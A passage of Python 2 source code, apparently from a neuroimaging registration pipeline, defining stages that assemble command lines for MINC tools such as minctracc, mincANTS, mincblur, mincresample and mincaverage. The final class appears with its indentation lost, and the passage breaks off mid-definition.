            if isFileHandler(inSource, inTarget):
                """Same defaults as minctracc class:
                    blur = None --> return lastblur
                    gradient = True --> return gradient instead of blur
                    if blur = -1 --> lastBaseVol returned and gradient ignored"""
                self.source = []
                self.target = []
                # Need to check that length of blur, gradient, similarity, weight
                # and radius_or_histo are the same
                self.checkArrayLengths(blur,
                                       gradient,
                                       similarity_metric,
                                       weight,
                                       radius_or_histo)
                # One (source, target) blur pair per multi-resolution level.
                for i in range(len(blur)):
                    self.source.append(inSource.getBlur(blur[i], gradient[i]))
                    self.target.append(inTarget.getBlur(blur[i], gradient[i]))
                """If no output transform is specified, use registerVolume to create a default.
                   If an output transform name is specified, use this as the output, and add it as the last xfm between source and target.
                   Note: The output file passed in must be a full path."""
                if not output:
                    outputXfm = inSource.registerVolume(inTarget, defaultDir)
                    self.output = outputXfm
                else:
                    self.output = output
                    inSource.addAndSetXfmToUse(inTarget, self.output)
                self.logFile = fh.logFromFile(inSource.logDir, self.output)
                self.useMask=useMask
                if self.useMask:
                    self.target_mask = inTarget.getMask()
            else:
                self.source = inSource
                self.target = inTarget
                #MF TODO: Need to find a way to specify multiple source and targets
                #based on blur and gradient
                self.output = output
                if not logFile:
                    self.logFile = fh.logFromFile(abspath(curdir), output)
                else:
                    self.logFile = logFile
                self.useMask=useMask
                if self.useMask:
                    self.target_mask = target_mask
        except:
            # Best-effort diagnostics; stage construction continues regardless.
            print "Failed in putting together mincANTS command."
            print "Unexpected error: ", sys.exc_info()
        self.similarity_metric = similarity_metric
        self.weight = weight
        self.iterations = iterations
        self.radius_or_histo = radius_or_histo
        """Single quotes needed on the command line for
           transformation_model and regularization
        """
        self.transformation_model = "'" + transformation_model + "'"
        self.regularization = "'" + regularization + "'"
        self.addDefaults()
        self.finalizeCommand()
        self.setName()
        self.colour = "red"
    def setName(self):
        # Human-readable stage name used by the pipeline.
        self.name = "mincANTS"
    def addDefaults(self):
        # Assemble one "-m 'metric[src,tgt,weight,radius]'" option per level,
        # then the fixed mincANTS invocation plus transform/regularization.
        cmd = []
        for i in range(len(self.similarity_metric)):
            cmd.append("-m")
            subcmd = ",".join([str(self.source[i]), str(self.target[i]),
                               str(self.weight[i]), str(self.radius_or_histo[i])])
            cmd.append("".join(["'", str(self.similarity_metric[i]), "[", subcmd, "]", "'"]))
        self.cmd = ["mincANTS", "3", "--number-of-affine-iterations", "0"]
        for c in cmd:
            self.cmd += [c]
        self.cmd += ["-t", self.transformation_model,
                     "-r", self.regularization,
                     "-i", self.iterations,
                     "-o", self.output]
        for i in range(len(self.source)):
            self.inputFiles += [self.source[i], self.target[i]]
        self.outputFiles = [self.output]
        if self.useMask and self.target_mask:
            self.cmd += ["-x", str(self.target_mask)]
            self.inputFiles += [self.target_mask]
    def finalizeCommand(self):
        # No extra options needed for mincANTS; hook kept for subclasses.
        pass
    def checkArrayLengths(self, blur, gradient, metric, weight, radius):
        # All per-level parameter lists must have the same length as blur.
        arrayLength = len(blur)
        errorMsg = "Array lengths for mincANTS command do not match."
        if (len(gradient) != arrayLength
            or len(metric) != arrayLength
            or len(weight) != arrayLength
            or len(radius) != arrayLength):
            print errorMsg
            # NOTE(review): bare `raise` with no active exception re-raises
            # nothing and itself errors; an explicit exception would be clearer.
            raise
        else:
            return
class minctracc(CmdStage):
    """Pipeline stage that runs a minctracc registration (linear or
    non-linear, selected by ``linearparam``) from a source to a target.

    Inputs may be RegistrationPipeFH file handlers or plain filename strings
    (in which case ``output`` and ``logFile`` must be supplied).
    """
    def __init__(self,
                 inSource,
                 inTarget,
                 output=None,
                 logFile=None,
                 defaultDir="transforms",
                 blur=None,
                 gradient=False,
                 linearparam="nlin",
                 source_mask=None,
                 target_mask=None,
                 iterations=40,
                 step=0.5,
                 transform=None,
                 weight=0.8,
                 stiffness=0.98,
                 similarity=0.8,
                 w_translations=0.4,
                 w_rotations=0.0174533,
                 w_scales=0.02,
                 w_shear=0.02,
                 simplex=1,
                 optimization="-use_simplex",
                 useMask=True):
        #MF TODO: Specify different w_translations, rotations, scales shear in each direction?
        # Now assumes same in all directions
        # Go to more general **kwargs?
        """an efficient way to add a minctracc call to a pipeline

        The constructor needs two inputFile arguments, the source and the
        target for the registration, and multiple optional arguments
        for specifying parameters. The source and the target can be
        specified as either RegistrationPipeFH instances or as strings
        representing filenames. In the latter case an output and a
        logfile filename are required as well (these are filled in
        automatically in the case of RegistrationPipeFH instances.)

        """
        CmdStage.__init__(self, None) #don't do any arg processing in superclass
        try:
            if isFileHandler(inSource, inTarget):
                """ if blur = None, getBlur returns lastblur
                if gradient is true, getBlur returns gradient instead of blur
                if blur = -1, lastBaseVol is returned and gradient is ignored.

                self.transform will be None if there is no previous transform
                between input and target. If this is the case, lsq6 and lsq12
                defaults are added in the setTransforms function
                """
                self.source = inSource.getBlur(blur, gradient)
                self.target = inTarget.getBlur(blur, gradient)
                self.transform = inSource.getLastXfm(inTarget)
                """If no output transform is specified, use registerVolume to create a default.
                   If an output transform name is specified, use this as the output, and add it as the last xfm between source and target.
                   Note: The output file passed in must be a full path."""
                if not output:
                    outputXfm = inSource.registerVolume(inTarget, defaultDir)
                    self.output = outputXfm
                else:
                    self.output = output
                    inSource.addAndSetXfmToUse(inTarget, self.output)
                    outputXfm = output
                self.logFile = fh.logFromFile(inSource.logDir, outputXfm)
                self.useMask = useMask
                if self.useMask:
                    self.source_mask = inSource.getMask()
                    self.target_mask = inTarget.getMask()
            else:
                self.source = inSource
                self.target = inTarget
                self.output = output
                if not logFile:
                    self.logFile = fh.logFromFile(abspath(curdir), output)
                else:
                    self.logFile = logFile
                self.transform = transform
                self.useMask = useMask
                if self.useMask:
                    self.source_mask = source_mask
                    self.target_mask = target_mask
        except:
            # Best-effort diagnostics; stage construction continues regardless.
            print "Failed in putting together minctracc command."
            print "Unexpected error: ", sys.exc_info()
        self.linearparam = linearparam
        self.iterations = str(iterations)
        # Lattice diameter is conventionally three times the step size here.
        self.lattice_diameter = str(step*3.0)
        self.step = str(step)
        self.weight = str(weight)
        self.stiffness = str(stiffness)
        self.similarity = str(similarity)
        self.w_translations = str(w_translations)
        self.w_rotations = str(w_rotations)
        self.w_scales = str(w_scales)
        self.w_shear = str(w_shear)
        self.simplex = str(simplex)
        self.optimization = str(optimization)
        self.addDefaults()
        self.finalizeCommand()
        self.setTransform()
        self.setName()
        self.colour = "red"
    def setName(self):
        if self.linearparam == "nlin":
            self.name = "minctracc nlin step: " + self.step
        else:
            self.name = "minctracc" + self.linearparam + " "
    def addDefaults(self):
        # Base minctracc invocation: weights in all three directions, step,
        # simplex/optimizer settings, tolerance, then source/target/output.
        self.cmd = ["minctracc",
                    "-clobber",
                    "-w_translations", self.w_translations,self.w_translations,self.w_translations,
                    "-w_rotations", self.w_rotations, self.w_rotations, self.w_rotations,
                    "-w_scales", self.w_scales, self.w_scales, self.w_scales,
                    "-w_shear", self.w_shear, self.w_shear, self.w_shear,
                    "-step", self.step, self.step, self.step,
                    "-simplex", self.simplex, self.optimization,
                    "-tol", str(0.0001),
                    self.source,
                    self.target,
                    self.output]
        # adding inputs and outputs
        self.inputFiles = [self.source, self.target]
        if self.useMask:
            if self.source_mask:
                self.inputFiles += [self.source_mask]
                self.cmd += ["-source_mask", self.source_mask]
            if self.target_mask:
                self.inputFiles += [self.target_mask]
                self.cmd += ["-model_mask", self.target_mask]
        self.outputFiles = [self.output]
    def setTransform(self):
        """If there is no last transform between the input and target (if using file handlers)
        or if there is no transform specified as an argument (if not using file handlers)
        set defaults based on linear parameter. If a transform is specified, use that one.
        Note that nothing is specified for nonlinear registrations with no transform,
        the minctracc defaults are fine.
        """
        if not self.transform:
            if self.linearparam == "lsq6":
                self.cmd += ["-est_center", "-est_translations"]
            elif self.linearparam == "lsq12" or self.linearparam=="nlin" or self.linearparam == "lsq6-identity":
                self.cmd += ["-identity"]
        else:
            self.inputFiles += [self.transform]
            self.cmd += ["-transform", self.transform]
    def finalizeCommand(self):
        """add the options to finalize the command"""
        if self.linearparam == "nlin":
            """add options for non-linear registration"""
            self.cmd += ["-iterations", self.iterations,
                         "-similarity", self.similarity,
                         "-weight", self.weight,
                         "-stiffness", self.stiffness,
                         "-nonlinear", "corrcoeff", "-sub_lattice", "6",
                         "-lattice_diameter", self.lattice_diameter,
                         self.lattice_diameter, self.lattice_diameter,
                         "-max_def_magnitude", str(1),
                         "-debug", "-xcorr"]
        else:
            #MF TODO: Enforce that options must be lsq6/7/9/12?
            """add the options for a linear fit"""
            # "lsq6-identity" maps to the plain -lsq6 flag; the identity
            # starting transform is handled separately in setTransform().
            if self.linearparam == "lsq6-identity":
                _numCmd = "-" + "lsq6"
            else:
                _numCmd = "-" + self.linearparam
            self.cmd += ["-xcorr", _numCmd]
class blur(CmdStage):
    """Pipeline stage wrapping mincblur with a given Gaussian FWHM, optionally
    producing the gradient volume as well."""
    def __init__(self,
                 inFile,
                 fwhm,
                 defaultDir="tmp",
                 gradient=False):
        """calls mincblur with the specified 3D Gaussian kernel

        The inputs can be in one of two styles. The first argument can
        be an instance of RegistrationPipeFH, in which case the last
        volume in that instance (i.e. inFile.lastBasevol) will be
        blurred and the output will be determined by its blurFile
        method. Alternately, the inFile can be a string representing a
        filename, in which case the output and logfile will be set based on
        the inFile name. If the fwhm specified is -1, we do not construct
        a command.
        """
        # fwhm == -1 means "no blur": bail out before the superclass is
        # initialized, so no command is ever built for this stage.
        if fwhm == -1:
            return
        CmdStage.__init__(self, None)
        try:
            if isFileHandler(inFile):
                blurlist = inFile.blurFile(fwhm, gradient, defaultDir)
                self.base = blurlist["base"]
                self.inputFiles = [inFile.getLastBasevol()]
                self.outputFiles = [blurlist["file"]]
                self.logFile = blurlist["log"]
                self.name = "mincblur " + str(fwhm) + " " + inFile.basename
                if gradient:
                    self.outputFiles.append(blurlist["gradient"])
            else:
                # Plain filename: derive output/log names from the input name.
                self.base = str(inFile).replace(".mnc", "")
                self.inputFiles = [inFile]
                blurBase = "".join([self.base, "_fwhm", str(fwhm), "_blur"])
                output = "".join([blurBase, ".mnc"])
                self.outputFiles = [output]
                self.logFile = fh.logFromFile(abspath(curdir), output)
                self.name = "mincblur " + str(fwhm) + " " + basename(inFile)
                if gradient:
                    gradientBase = blurBase.replace("blur", "dxyz")
                    self.outputFiles += ["".join([gradientBase, ".mnc"])]
        except:
            # Best-effort diagnostics; stage construction continues regardless.
            print "Failed in putting together blur command."
            print "Unexpected error: ", sys.exc_info()
        self.cmd = ["mincblur", "-clobber", "-no_apodize", "-fwhm", str(fwhm),
                    self.inputFiles[0], self.base]
        if gradient:
            self.cmd += ["-gradient"]
        self.colour="blue"
class autocrop(CmdStage):
    """Pipeline stage that resamples a volume to an isotropic resolution via
    the autocrop tool (forcing mincresample with -resample)."""
    def __init__(self,
                 resolution,
                 inFile,
                 output=None,
                 logFile=None,
                 defaultDir="resampled"):
        """Resamples the input file to the resolution specified
           using autocrop. The -resample flag forces the use of
           mincresample.
           Resolutions should be specified in mm.
           e.g. 56 microns should be specified as 0.056
        """
        CmdStage.__init__(self, None)
        self.resolution = str(resolution)
        try:
            if isFileHandler(inFile):
                self.inFile = inFile.getLastBasevol()
                self.outfile = self.setOutputFile(inFile, defaultDir)
                self.logFile = fh.logFromFile(inFile.logDir, self.outfile)
            else:
                self.inFile = inFile
                self.outfile = output
                if not logFile:
                    self.logFile = fh.logFromFile(abspath(curdir), output)
                else:
                    self.logFile = logFile
        except:
            # Best-effort diagnostics; stage construction continues regardless.
            print "Failed in putting together autocrop command"
            print "Unexpected error: ", sys.exc_info()
        self.addDefaults()
        self.finalizeCommand()
        self.setName()
    def addDefaults(self):
        self.inputFiles += [self.inFile]
        self.outputFiles += [self.outfile]
        self.cmd += ["autocrop",
                     "-resample",
                     "-isostep", self.resolution]
    def finalizeCommand(self):
        self.cmd += ["-clobber", self.inFile, self.outfile]
    def setName(self):
        self.name = "autocrop "
    def setOutputFile(self, inFile, defaultDir):
        # Builds the output name and, as a side effect, points the file
        # handler's last base volume at the resampled file.
        outDir = inFile.setOutputDirectory(defaultDir)
        outBase = (fh.removeBaseAndExtension(inFile.getLastBasevol()) + "_"
                   + self.resolution + "res.mnc")
        outputFile = fh.createBaseName(outDir, outBase)
        inFile.setLastBasevol(outputFile)
        return(outputFile)
class mincresampleFileAndMask(object):
    """
    If the input file to mincresample(CmdStage) is a file handler, and there is
    a mask associated with the file, the most intuitive thing to do is
    to resample both the file and the mask. However, a true atom/command stage
    can only create a single stage, and a such mincresample(CmdStage) can not
    resample both. When using a file handler, the mask file associated with it
    is used behind the scenes without the user explicitly specifying this behaviour.
    That's why it is important that the mask always remains current/up-to-date. The
    best way to do that is to automatically resample the associated mask when the
    main file is being resampled. And that is where this class comes in. It serves
    as a wrapper around mincresample(CmdStage) and mincresampleMask(CmdStage). It
    will check whether the input file is a file handler, and if so, will resample
    the mask that is associated with it (if it exists).

    This class is not truly an atom/command stage, so technically should not live in
    the minc_atoms module. It is still kept here because in essence it serves as a
    single indivisible stage. (and because the user is more likely to call/find it
    when looking for the mincresample stage)
    """
    def __init__(self,
                 inFile,
                 targetFile,
                 nameForStage=None,
                 **kwargs):
        self.p = Pipeline()
        self.outputFiles = [] # this will contain the outputFiles from the mincresample of the main MINC file
        self.outputFilesMask = [] # this will contain the outputFiles from the mincresample of the mask belonging to the main MINC file
        # the first step is to simply run the mincresample command:
        fileRS = mincresample(inFile,
                              targetFile,
                              **kwargs)
        if(nameForStage):
            fileRS.name = nameForStage
        self.p.addStage(fileRS)
        self.outputFiles = fileRS.outputFiles
        # initialize the array of outputs for the mask in case there is none to be resampled
        self.outputFilesMask = [None] * len(self.outputFiles)
        # next up, is this a file handler, and if so is there a mask that needs to be resampled?
        if(isFileHandler(inFile)):
            if(inFile.getMask()):
                # there is a mask associated with this file, should be updated
                # we have to watch out in terms of interpolation arguments, if
                # the original resample command asked for "-sinc" or "-tricubic"
                # for instance, we should remove that argument for the mask resampling
                # these options would reside in the argArray...
                maskArgs = copy.deepcopy(kwargs)
                if maskArgs.has_key("argArray"):
                    argList = maskArgs["argArray"]
                    # NOTE(review): deleting while indexing forward can skip
                    # the element after a removed one; confirm argArray never
                    # holds two adjacent interpolation flags.
                    for i in range(len(argList)):
                        if(re.match("-sinc", argList[i]) or
                           re.match("-trilinear", argList[i]) or
                           re.match("-tricubic", argList[i]) ):
                            del argList[i]
                    maskArgs["argArray"] = argList
                # if the output file for the mincresample command was already
                # specified, add "_mask.mnc" to it
                if maskArgs.has_key("output"):
                    maskArgs["output"] = re.sub(".mnc", "_mask.mnc", maskArgs["output"])
                maskRS = mincresampleMask(inFile,
                                          targetFile,
                                          **maskArgs)
                if(nameForStage):
                    maskRS.name = nameForStage + "--mask--"
                self.p.addStage(maskRS)
                self.outputFilesMask = maskRS.outputFiles
class mincresample(CmdStage):
    """Pipeline stage wrapping mincresample: resamples the source's last base
    volume through the last (or given) transform toward the target."""
    def __init__(self,
                 inFile,
                 targetFile,
                 **kwargs):
        """calls mincresample with the specified options

        The inFile and likeFile can be in one of two styles.
        The first argument can be an instance of RegistrationPipeFH.
        In this case the last volume in that instance (i.e. inFile.lastBasevol)
        will be resampled and the output will be determined accordingly.
        Alternatively, the inFile can be a string representing a
        filename, in which case the output and logfile will be set based on
        the inFile name.

        inFile is required, everything else optional
        This class assuming use of the most commonly used flags (-2, -clobber, -like, -transform)
        Any commands above and beyond the standard will be read in from argarray
        argarray could contain inFile and/or output files
        """
        argArray = kwargs.pop("argArray", None)
        if not argArray:
            CmdStage.__init__(self, ["mincresample"])
        else:
            CmdStage.__init__(self, ["mincresample"] + argArray)
        try:
            #MF TODO: What if we don't want to use lastBasevol?
            if isFileHandler(inFile, targetFile):
                self.inFile = self.getFileToResample(inFile, **kwargs)
                self.targetFile = targetFile.getLastBasevol()
                likeFile=kwargs.pop("likeFile", None)
                if likeFile:
                    if isFileHandler(likeFile):
                        self.likeFile = likeFile.getLastBasevol()
                    else:
                        print "likeFile must be RegistrationPipeFH or RegistrationFHBase."
                        raise
                # If "-invert" appears in the extra args, the transform is
                # looked up in the opposite direction (target -> source).
                invert = False
                for cmd in self.cmd:
                    if fnmatch.fnmatch(cmd, "*-invert*"):
                        invert = True
                        break
                xfm = kwargs.pop("transform", None)
                if xfm:
                    self.cxfm = xfm
                else:
                    if invert:
                        self.cxfm = targetFile.getLastXfm(inFile)
                    else:
                        self.cxfm = inFile.getLastXfm(targetFile)
                self.outputLocation=kwargs.pop("outputLocation", None)
                if not self.outputLocation:
                    self.outputLocation=inFile
                else:
                    if not isFileHandler(self.outputLocation):
                        print "outputLocation must be RegistrationPipeFH or RegistrationFHBase."
                        raise
                default = kwargs.pop("defaultDir", None)
                if not default:
                    defaultDir = "resampled"
                else:
                    defaultDir = default
                """If an output file is specified, then use it, else create a default file name.
                   Note: The output file passed in must be a full path."""
                output = kwargs.pop("output", None)
                if not output:
                    self.outfile = self.setOutputFile(self.outputLocation, defaultDir)
                else:
                    self.outfile = output
                self.logFile = fh.logFromFile(self.outputLocation.logDir, self.outfile)
            else:
                self.inFile = inFile
                self.targetFile = targetFile
                self.likeFile = kwargs.pop("likeFile", None)
                self.cxfm = kwargs.pop("transform", None)
                self.outfile=kwargs.pop("output", None)
                logFile=kwargs.pop("logFile", None)
                if not logFile:
                    self.logFile = fh.logFromFile(abspath(curdir), self.outfile)
                else:
                    self.logFile = logFile
        except:
            # Best-effort diagnostics; stage construction continues regardless.
            print "Failed in putting together resample command"
            print "Unexpected error: ", sys.exc_info()
        self.addDefaults()
        self.finalizeCommand()
        self.setName()
        if isFileHandler(inFile, targetFile):
            self.setLastResampledFile()
    def addDefaults(self):
        self.inputFiles += [self.inFile, self.targetFile]
        self.outputFiles += [self.outfile]
        if self.likeFile:
            self.cmd += ["-like", self.likeFile]
            if not self.likeFile in self.inputFiles:
                self.inputFiles += [self.likeFile]
        if self.cxfm:
            self.inputFiles += [self.cxfm]
            self.cmd += ["-transformation", self.cxfm]
    def finalizeCommand(self):
        """Add -2, clobber, input and output files """
        self.cmd += ["-2", "-clobber", self.inFile, self.outfile]
    def setName(self):
        self.name = "mincresample "
    def setOutputFile(self, FH, defaultDir):
        # Default output name is derived from the transform's base name.
        outBase = fh.removeBaseAndExtension(self.cxfm) + "-resampled.mnc"
        outDir = FH.setOutputDirectory(defaultDir)
        return(fh.createBaseName(outDir, outBase))
    def getFileToResample(self, inputFile, **kwargs):
        return(inputFile.getLastBasevol())
    def setLastResampledFile(self):
        # We want to keep track of the last file that was resampled. This can be
        # useful when we want to set the lastBaseVol or mask related to this file
        # handler. This function needs to be overridden by the children of this
        # class, because depending on what we resample (main file, mask, labels)
        # a different "setLast...Vol" needs to be called.
        #
        # For the main mincresample class, it should be the setLastResampledVol
        self.outputLocation.setLastResampledVol(self.outputFiles[0])
class mincresampleLabels(mincresample):
    """mincresample specialization for label volumes: nearest-neighbour
    interpolation, real-range preservation, and bookkeeping of the resampled
    labels on the output file handler."""
    def __init__(self,
                 inFile,
                 targetFile,
                 **kwargs):
        self.initInputLabels(kwargs.pop("setInputLabels", None))
        mincresample.__init__(self,
                           inFile,
                           targetFile,
                           **kwargs)
        if isFileHandler(self.outputLocation):
            #After other initialization, addLabels to appropriate array
            self.addLabelsToArray(self.outputLocation)
    def initInputLabels(self, setLabels):
        if setLabels:
            self.setInputLabels = setLabels
        else:
            self.setInputLabels = False
    def finalizeCommand(self):
        """additional arguments needed for resampling labels"""
        # Labels are categorical: keep the real range and use nearest
        # neighbour so no interpolated (fractional) label values appear.
        self.cmd += ["-keep_real_range", "-nearest_neighbour"]
        mincresample.finalizeCommand(self)
    def setOutputFile(self, FH, defaultDir):
        """set name of output and add labels to appropriate likeFile labels array"""
        outBase = self.setOutputFileName(FH, append="labels")
        outDir = FH.setOutputDirectory(defaultDir)
        return(fh.createBaseName(outDir, outBase))
    def setOutputFileName(self, FH, **funcargs):
        endOfFile = "-" + funcargs["append"] + ".mnc"
        if self.setInputLabels:
            # Derive the name from the transform, stripping the registration
            # tool suffix (_minctracc_/_ANTS_) if present.
            outBase = fh.removeBaseAndExtension(self.cxfm)
            if fnmatch.fnmatch(outBase, "*_minctracc_*"):
                outputName = outBase.split("_minctracc_")[0]
            elif fnmatch.fnmatch(outBase, "*_ANTS_*"):
                outputName = outBase.split("_ANTS_")[0]
            else:
                outputName = outBase
            outBase = outputName + "-input"
        else:
            labelsToResample = fh.removeBaseAndExtension(self.inFile)
            likeBaseVol = fh.removeBaseAndExtension(FH.getLastBasevol())
            outBase = labelsToResample + "_to_" + likeBaseVol
        outBase += endOfFile
        return outBase
    def addLabelsToArray(self, FH):
        FH.addLabels(self.outfile, inputLabel=self.setInputLabels)
    def getFileToResample(self, inputFile, **kwargs):
        index = kwargs.pop("labelIndex", None)
        if index > -1:
            # We always resample from inputLabels, so use returnLabels(True)
            labelArray=inputFile.returnLabels(True)
        else:
            # NOTE(review): labelArray is unbound in this branch — reaching it
            # (index None or <= -1) raises UnboundLocalError. Intended
            # behaviour unclear; confirm callers always pass a valid index.
            labelArray[index] = None
        return(labelArray[index])
    def setLastResampledFile(self):
        # Currently we do not keep track of the last label file that is
        # resampled
        pass
class mincresampleMask(mincresampleLabels):
    """mincresample specialization for mask volumes; resamples the file
    handler's mask (or a labels entry as fallback) and records the result."""
    def __init__(self,
                 inFile,
                 targetFile,
                 **kwargs):
        mincresampleLabels.__init__(self,
                                 inFile,
                                 targetFile,
                                 **kwargs)
    def getFileToResample(self, inputFile, **kwargs):
        #MF TODO: We will have to adjust this if we allow for pairwise
        # crossing to calculate masks.
        """ Assume we are using mask from inputFile. If this does not exist,
            we assume inputLabels are also masks from previous iteration
            and we can use same logic as for mask=False."""
        maskToUse = inputFile.getMask()
        if maskToUse:
            return maskToUse
        else:
            index = kwargs.pop("labelIndex", None)
            labelArray=inputFile.returnLabels(True)
            return(labelArray[index])
    def setOutputFile(self, FH, defaultDir):
        # add -mask to appended file
        outBase = self.setOutputFileName(FH, append="mask")
        outDir = FH.setOutputDirectory(defaultDir)
        return(fh.createBaseName(outDir, outBase))
    def setLastResampledFile(self):
        # Instead of setting the LastResampledVol, here we need to set the
        # LastResampledMaskVol
        self.outputLocation.setLastResampledMaskVol(self.outputFiles[0])
class mincAverage(CmdStage):
    """Pipeline stage wrapping mincaverage: averages a list of volumes into a
    normalized mean, also producing a standard-deviation volume (-sd.mnc)."""
    def __init__(self,
                 inputArray,
                 outputAvg,
                 output=None,
                 logFile=None,
                 defaultDir="tmp"):
        CmdStage.__init__(self, None)
        try:
            """If output is fileHandler, we assume input array is as well"""
            if isFileHandler(outputAvg):
                self.filesToAvg = []
                for i in range(len(inputArray)):
                    self.filesToAvg.append(inputArray[i].getLastBasevol())
                """If no output file is specified, create default, using file handler
                   otherwise use what is specified."""
                if not output:
                    self.output = self.setOutputFile(outputAvg, defaultDir)
                else:
                    self.output = output
                self.logFile = fh.logFromFile(outputAvg.logDir, self.output)
            else:
                self.filesToAvg = inputArray
                self.output = outputAvg
                if not logFile:
                    self.logFile = fh.logFromFile(abspath(curdir), outputAvg)
                else:
                    self.logFile = logFile
        except:
            # Best-effort diagnostics; stage construction continues regardless.
            print "Failed in putting together mincaverage command"
            print "Unexpected error: ", sys.exc_info()
        self.addDefaults()
        self.finalizeCommand()
        self.setName()
    def addDefaults(self):
        for i in range(len(self.filesToAvg)):
            self.inputFiles.append(self.filesToAvg[i])
        # Standard-deviation volume is named after the output with a -sd suffix.
        self.sd = splitext(self.output)[0] + "-sd.mnc"
        self.outputFiles += [self.output, self.sd]
        self.cmd += ["mincaverage",
                     "-clobber", "-normalize", "-sdfile", self.sd, "-max_buffer_size_in_kb", str(409620)]
    def finalizeCommand(self):
        for i in range(len(self.filesToAvg)):
            self.cmd.append(self.filesToAvg[i])
        self.cmd.append(self.output)
    def setName(self):
        self.name = "mincaverage "
    def setOutputFile(self, inFile, defaultDir):
        outDir = inFile.setOutputDirectory(defaultDir)
        outBase = (fh.removeBaseAndExtension(inFile.getLastBasevol()) + "_" + "avg.mnc")
        outputFile = fh.createBaseName(outDir, outBase)
        return(outputFile)
class mincAverageDisp(mincAverage):
    """mincaverage variant for displacement fields: unlike the parent it adds
    neither -normalize nor a standard-deviation output file."""

    def __init__(self,
                 inputArray,
                 output,
                 logFile=None,
                 defaultDir=None):
        mincAverage.__init__(self, inputArray, output, logFile=logFile, defaultDir=defaultDir)

    def addDefaults(self):
        # Plain average: every input file, the single output, and a bare
        # "mincaverage -clobber" invocation.
        self.inputFiles.extend(self.filesToAvg)
        self.outputFiles += [self.output]
        self.cmd += ["mincaverage", "-clobber"]
class RotationalMinctracc(CmdStage):
    """
    This class runs a rotational_minctracc.py call on its two input
    files. That program performs a 6 parameter (rigid) registration
    by doing a brute force search in the x,y,z rotation space. Normally
    the input files have unknown orientation. Input and output files
    can be specified either as file handlers, or as string representing
    the filenames.

    * The input files are assumed to have already been blurred appropriately

    There are a number of parameters that have to be set and this
    will be done using factors that depend on the resolution of the
    input files. The blur parameter is given in mm, not as a factor
    of the input resolution. The blur parameter is necessary in order
    to retrieve the correct blur file from the file handler. Here is the list:

    argument to be set -- default (factor) -- (for 56 micron, translates to)
    blur                  0.56 (mm)            (560 micron) (note, this is in mm, not a factor)
    resample stepsize     4                    (224 micron)
    registration stepsize 10                   (560 micron)
    w_translations        8                    (448 micron)

    Specifying -1 for the blur argument will result in retrieving an unblurred file.

    The two other parameters that can be set are (in degrees) have defaults:
    rotational range      50
    rotational interval   10

    Whether or not a mask will be used is based on the presence of a mask
    in the target file. Alternatively, a mask can be specified using the
    maskFile argument.
    """
    def __init__(self,
                 inSource,
                 inTarget,
                 output = None, # ability to specify output transform when using strings for input
                 logFile = None,
                 maskFile = None,
                 defaultDir="transforms",
                 blur=0.56,
                 resample_step=4,
                 registration_step=10,
                 w_translations=8,
                 rotational_range=50,
                 rotational_interval=10,
                 mousedata=False):
        CmdStage.__init__(self, None) #don't do any arg processing in superclass
        # handling of the input files
        try:
            if rf.isFileHandler(inSource, inTarget):
                # File-handler mode: fetch the pre-blurred volumes at the
                # requested fwhm (blur=-1 retrieves the unblurred file).
                self.source = inSource.getBlur(fwhm=blur)
                self.target = inTarget.getBlur(fwhm=blur)
                if(output == None):
                    self.output = inSource.registerVolume(inTarget, defaultDir)
                else:
                    self.output = output
                if(logFile == None):
                    self.logFile = fh.logFromFile(inSource.logDir, self.output)
                else:
                    self.logFile = logFile
            else:
                # TODO: fix this to work with string input files
                self.source = inSource
                self.target = inTarget
        except:
            # NOTE(review): bare `except:` also catches SystemExit and
            # KeyboardInterrupt before re-raising them below.
            print "Failed in putting together RotationalMinctracc command."
            print "Unexpected error: ", sys.exc_info()
            raise
        highestResolution = rf.returnFinestResolution(inSource)
        # The step parameters are factors of the finest input resolution;
        # rotational range/interval are absolute degrees.
        # TODO: honour the mousedata flag with dataset-specific defaults.
        self.addDefaults(resample_step * highestResolution,
                         registration_step * highestResolution,
                         w_translations * highestResolution,
                         int(rotational_range),
                         int(rotational_interval))
        # potentially add a mask to the command
        self.finalizeCommand(inTarget, maskFile)
        self.setName()
        self.colour = "green"

    def setName(self):
        # Stage name shown in the pipeline graph/logs.
        self.name = "rotational-minctracc"

    def addDefaults(self,
                    resamp_step,
                    reg_step,
                    w_trans,
                    rot_range,
                    rot_interval):
        # w_translations is passed as "x,y,z" with the same value per axis.
        w_trans_string = str(w_trans) + ',' + str(w_trans) + ',' + str(w_trans)
        cmd = ["rotational_minctracc.py",
               "-t", "/dev/shm/",
               "-w", w_trans_string,
               "-s", str(resamp_step),
               "-g", str(reg_step),
               "-r", str(rot_range),
               "-i", str(rot_interval),
               self.source,
               self.target,
               self.output,
               "/dev/null"]
        self.inputFiles = [self.source, self.target]
        self.outputFiles = [self.output]
        self.cmd = cmd

    def finalizeCommand(self,
                        inTarget,
                        maskFile):
        if(maskFile):
            # a mask file has been given directly; it takes precedence over
            # any mask attached to the target
            self.cmd += ["-m", maskFile]
            self.inputFiles.append(maskFile)
        else:
            try:
                mask = inTarget.getMask()
                if mask:
                    self.cmd += ["-m", mask]
                    self.inputFiles.append(mask)
            except:
                print "Failed retrieving information about a mask for the target in RotationalMinctracc."
                print "Unexpected error: ", sys.exc_info()
                raise
class xfmConcat(CmdStage):
    """
    Runs xfmconcat on one or more input transformations.

    inputFiles: input filename string, or a list of such strings, to concatenate
    outputFile: string representing the output filename
    logFile:    optional log filename; when omitted, self.logFile is set in
                CmdStage.__init__ (or subsequently via setLogFile)
    """
    def __init__(self,
                 inputFiles,
                 outputFile,
                 logFile=None):
        CmdStage.__init__(self, None)
        # A single transform may be passed directly; normalize it to a list.
        if type(inputFiles) is not list:
            inputFiles = [inputFiles]
        self.inputFiles = inputFiles
        self.outputFiles = [outputFile]
        self.logFile = logFile
        self.cmd = ["xfmconcat", "-clobber"] + inputFiles + [outputFile]
        self.name = "xfm-concat"
        self.colour = "yellow"
class xfmInvert(CmdStage):
"""
Calls xfminvert on a single input transformation
__init__ arguments:
Required: 1. xfm: string representing the full path of the transform to be inverted
Optional: 2. FH: fileHandler for assigning location for output and logFiles
3. logFile (used only if a file handler is not specified. If both a logFile
and file handler are specified, the logFile is ignored. If the logFile and FH
are both unspecified, self.logFile will be set in CmdStage.__init__
(or subsequently, using the setLogFile function)
"""
def __init__(self,
xfm,
FH=None,
logFile=None):
CmdStage.__init__(self, None)
try:
self.xfm = xfm
if isFileHandler(FH):
invXfmBase = fh.removeBaseAndExtension(self.xfm).split(".xfm")[0]
self.output = fh.createBaseName(FH.transformsDir, invXfmBase + "_inverted.xfm")
self.logFile = fh.logFromFile(FH.logDir, self.output)
else:
invXfmBase = splitext(self.xfm)[0]
self.output = invXfmBase + "_inverted.xfm"
if logFile:
